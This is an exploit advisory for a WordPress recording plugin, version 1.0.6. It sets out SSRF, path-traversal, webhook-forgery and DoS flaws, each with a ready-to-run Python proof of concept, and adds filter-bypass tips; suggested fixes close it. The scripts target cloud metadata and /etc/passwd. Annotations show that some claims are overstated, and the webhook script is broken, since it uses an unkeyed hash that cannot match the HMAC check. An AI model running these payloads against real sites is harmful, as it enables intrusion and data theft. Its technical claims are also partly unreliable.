WordPress Pipe Audio Video and Screen Recorder 1.0.6 - Multiple Vulnerabilities

2025.04.06
Credit: bRpsd
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WordPress Pipe Audio Video and Screen Recorder 1.0.6 - Multiple Vulnerabilities
# Date: March 28, 2025
# Exploit Author: bRpsd cy[at]live.no
# Plugin Link: https://wordpress.org/plugins/pipe-audio-video-and-screen-recorder/
# Version: 1.0.6
# Tested on: MacOS local Xampp

Vulnerability1: SSRF in File Download
File: load/AddPipe.php
Function: addpipe_handle_download()
Vulnerable Code:
================================================================================================
public function addpipe_handle_download() {
    // ...
    $fileUrl = isset($_POST['file']) ? esc_url_raw(wp_unslash($_POST['file'])) : '';
    $allowed_domains = ['addpipe.com'];
    $parsed_url = wp_parse_url($fileUrl);
    if (!isset($parsed_url['host']) || !in_array($parsed_url['host'], $allowed_domains, true)) {
        wp_send_json_error(['message' => 'Unauthorized domain'], 403);
    }
    $fileContent = @file_get_contents($fileUrl); // SSRF here
    // ...
}
================================================================================================
Note: the host check is an exact match against addpipe.com and is applied only to the URL as submitted. file_get_contents() follows HTTP redirects by default, so the final destination is never validated. The PoC below assumes a redirect endpoint exists on the allowlisted host; the page does not show one.

Vuln1 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import requests

target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_NONCE_HERE" # Replace with actual nonce

# Craft malicious URL (redirects to internal service)
malicious_url = "https://addpipe.com/redirect?url=http://169.254.169.254/latest/meta-data"

data = {
    "action": "addpipe_download_file",
    "file": malicious_url,
    "_wpnonce": nonce
}

response = requests.post(target, data=data)
print(f"SSRF Response ({response.status_code}):\n{response.text[:500]}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Vulnerability2: LFI via Quality Parameter
File: load/AddPipe.php
Function: addpipe_ajax_shortcode_generator()
Vulnerable Code:
================================================================================================
public function
addpipe_ajax_shortcode_generator() {
    // ...
    $quality = isset($_POST['quality']) ? sanitize_text_field(wp_unslash($_POST['quality'])) : '';
    $qualityurl = "avq/" . $quality . ".xml"; // LFI here
    $data = [
        'qualityurl' => $qualityurl,
        // ...
    ];
    // ...
}
================================================================================================
Note: sanitize_text_field() does not remove "../" sequences, so the value reaches the path string unchanged. The excerpt only shows the string being placed in $data; whether a local file is actually read depends on how qualityurl is consumed afterwards, which is not shown here.

Vuln2 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import requests
from urllib.parse import quote

target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_NONCE_HERE" # Replace with actual nonce

# Directory traversal payload
lfi_payload = quote("../../../../etc/passwd")

data = {
    "action": "addpipe_ajax_shortcode_generator",
    "quality": lfi_payload,
    "_wpnonce": nonce
}

response = requests.post(target, data=data)
print(f"LFI Response ({response.status_code}):\n{response.text}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Vulnerability3: Webhook Signature Bypass
File: load/AddPipe.php
Function: addpipeWebhook()
Vulnerable Code:
================================================================================================
public function addpipeWebhook() {
    $webhook_url = admin_url('admin-ajax.php?action=addpipeWebhook');
    $received_signature = $_SERVER['HTTP_X_PIPE_SIGNATURE'] ?? '';
    $json_payload = file_get_contents('php://input');
    $data_to_sign = $webhook_url . $json_payload;
    $expected_signature = base64_encode(hash_hmac('sha1', $data_to_sign, $this->pipeWebhookKey, true));
    if (!hash_equals($expected_signature, $received_signature)) {
        wp_die('Unauthorized request', 403);
    }
    // ...
}
================================================================================================
Note: the handler computes a keyed HMAC-SHA1 over the webhook URL plus the request body and compares it with hash_equals(). A request is accepted only when the sender knows pipeWebhookKey. The PoC below presupposes a guessed or exposed key, so the risk described is the strength and storage of that key rather than a flaw in the comparison itself.

Vuln3 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import hashlib
import base64
import requests

webhook_url = "http://example.com/wp-admin/admin-ajax.php?action=addpipeWebhook"
known_key = "WEAK_SECRET_KEY" # Replace with guessed/exposed key

malicious_payload = {
    "event": "video_recorded",
    "data": {
        "id": 666,
        "envCode": "attacker_env",
        "videoName": "hacked_recording"
    }
}

# Generate forged signature
signature_data = webhook_url + str(malicious_payload)
signature = base64.b64encode(
    hashlib.sha1(signature_data.encode()).hexdigest().encode()
).decode()

headers = {
    "X-Pipe-Signature": signature,
    "Content-Type": "application/json"
}

response = requests.post(webhook_url, json=malicious_payload, headers=headers)
print(f"Webhook Injection ({response.status_code}): {response.text}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Vulnerability4: DoS via Sync Endpoint
File: load/AddPipe.php
Function: addpipe_ajax_sync_deleted()
Vulnerable Code:
================================================================================================
public function addpipe_ajax_sync_deleted() {
    foreach ($this->addpipeGetRecordedRecordings() as $obj) {
        if (!$this->addpipeIsFileOnServer($obj->recording_url)) {
            $wpdb->query("UPDATE {$wpdb->prefix}addpipe_records SET active = 0...");
        }
    }
}
================================================================================================
Note: each call performs one file check per stored recording and may issue one UPDATE per missing file; no throttling is visible in the excerpt. The PoC states that an admin nonce is required, so this is load caused by an already-authenticated administrator.

Vuln4 POC:
import requests
from concurrent.futures import ThreadPoolExecutor

target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_ADMIN_NONCE" # Requires admin privileges

def send_sync_request(_):
    data = {"action": "addpipe_ajax_sync_deleted", "_wpnonce": nonce}
    response = requests.post(target, data=data)
    return response.status_code

# Launch 100 concurrent requests
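with ThreadPoolExecutor(max_workers=20) as executor:
    results = list(executor.map(send_sync_request, range(100)))
print(f"DoS Results: {set(results)}")

Defense Bypass:
For LFI/SSRF:
- Use double encoding (%252e%252e%252f)
- Chain with open redirect vulnerabilities
- Exploit parser inconsistencies (e.g., ///etc/passwd)

Fixes:
(None were supplied in the original advisory; the items below are suggested mitigations based on the excerpts above.)
- File download: replace file_get_contents() with the WordPress HTTP API with redirects disabled (e.g. wp_safe_remote_get() with 'redirection' => 0), so the host that passed the allowlist is the host actually contacted.
- Quality parameter: accept only a fixed allowlist of known quality profile names, and reject any value containing dots or path separators. Validate after decoding and canonicalisation, since string blacklists are what the bypasses listed above target.
- Webhook: keep the hash_equals() HMAC check, generate pipeWebhookKey from a cryptographically secure random source, keep it out of client-visible output, and rotate it if exposed.
- Sync endpoint: enforce a capability check together with the nonce, and throttle or lock the job so only one sync runs at a time.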

